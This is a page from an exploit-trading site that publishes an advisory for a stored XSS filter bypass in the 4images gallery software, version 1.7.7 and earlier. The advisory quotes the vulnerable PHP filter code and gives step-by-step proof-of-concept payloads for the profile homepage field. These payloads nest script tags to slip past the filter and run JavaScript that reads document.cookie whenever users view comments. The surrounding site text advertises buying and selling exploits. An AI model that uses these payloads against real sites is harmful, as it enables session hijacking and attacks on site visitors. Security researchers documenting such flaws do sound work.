0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
4images <= 1.7.7 Filter Bypass HTML Injection/XSS Vulnerability
=============================================================== 4images <= 1.7.7 Filter Bypass HTML Injection/XSS Vulnerability =============================================================== =By: Qabandi From Kuwait, PEACE... =Vuln: 4images <= 1.7.7 - filter bypass HTML injection/XSS =INFO: ~~~ =BUY: ~~~ =DORK: ~~~ _-=/:Conditions:\=-_ --------------------------------------------------------------------------------- ; Magic quotes for incoming GET/POST/Cookie data. magic_quotes_gpc = Off Comments allowed[+] Registration[+] Works on default 4images comments settings. XSS used works with latest FireFox browser, you can use your own code. --------------------------------------=_=--------------------------------------- _-=/:Vulnerable_Code:\=-_ --------------------------------------------------------------------------------- in "./4images/details.php" we see::--//First-Mistake//-- 380:: $comment_user_homepage = (isset($comment_row[$i][$user_table_fields['user_homepage']])) ? format_url($comment_row[$i][$user_table_fields['user_homepage']]) : ""; 381:: if (!empty($comment_user_homepage)) { //as you can see, it just grabs whatever is in the SQL database and adds it, puts it thru format_url() //which is nothing and relies on the filter when creating or editing USER_HOMEPAGE //lets take a look what happends when updating user_homepage in "./4images/member.php":://this what happends when UPDATING user_homepage thru the profile page 1053:: $user_homepage = (isset($HTTP_POST_VARS['user_homepage'])) ? format_url(un_htmlspecialchars(trim($HTTP_POST_VARS['user_homepage']))) : ""; //user_homepage goes thru THREE functions, lets see what they do.. //format_url(); function format_url($url) { if (empty($url)) { return ''; } if (!preg_match("/^https?:\/\//i", $url)) { $url = "http://".$url; } return $url; } ///ok cool makes sure the URL is cool //trim() <-- built in PHP function //un_htmlspecialchars(); function un_htmlspecialchars($text) { $text = str_replace( array('<', '>', '"', '&'), array('<', '>', '"', '&'), $text ); return $text; } //interesting but im afraid this is another mistake Q_Q //anyway, point is the XSS filter in GLOBAL.PHP can be bypassed // Lets take a small look at what the script does with all vars in "./4images/global.php":: 181:: // Remove really unwanted tags 182:: do { 183:: $oldstring = $string; 184:: $string = preg_replace('#</*(applet|meta|xml|blink|link|style|script|embed|object|iframe|frame|frameset|ilayer|layer|bgsound|title|base)[^>]*>#i',"",$string); 185:: } while ($oldstring != $string); 186:: 187:: return $string; 188:: } //Can be bypassed.. // since it looks for <script> and replaces it with nothing, we can use the old <scr<script>ipt> method // but a bit more advanced. ---------------------------------------=_=-------------------------------------- _-=/:P.o.C:\=-_ --------------------------------------------------------------------------------- all we need is a user account, so register then go to your edit profile: ( ./4images/member.php?action=editprofile ) at the HOMEPAGE input box, type the following: http://www.dummy.com/"><script>alert('qabandi')</script> The script will convert it to : http://www.dummy.com/">alert('qabandi') now type this :) http://"><body<script> <script>on<script>loa<script>d="javascript:alert(document.cookie);qabandi" /> Result after SAVE: http://"><body onload="javascript:alert(document.cookie);qabandi" /> BAAM! go to any picture like ( ./4images/details.php?image_id=1 ) post a comment, refresh, and javascript will be executed. you pretty much can bypass any of the wordlist provided in global.php you can inject HTML code pretty much now this is good because this shows that you can bypass their filter, what else can you do other than xss i wonder? ---------------------------------------=_=-------------------------------------- # 0day.today [2024-12-25] #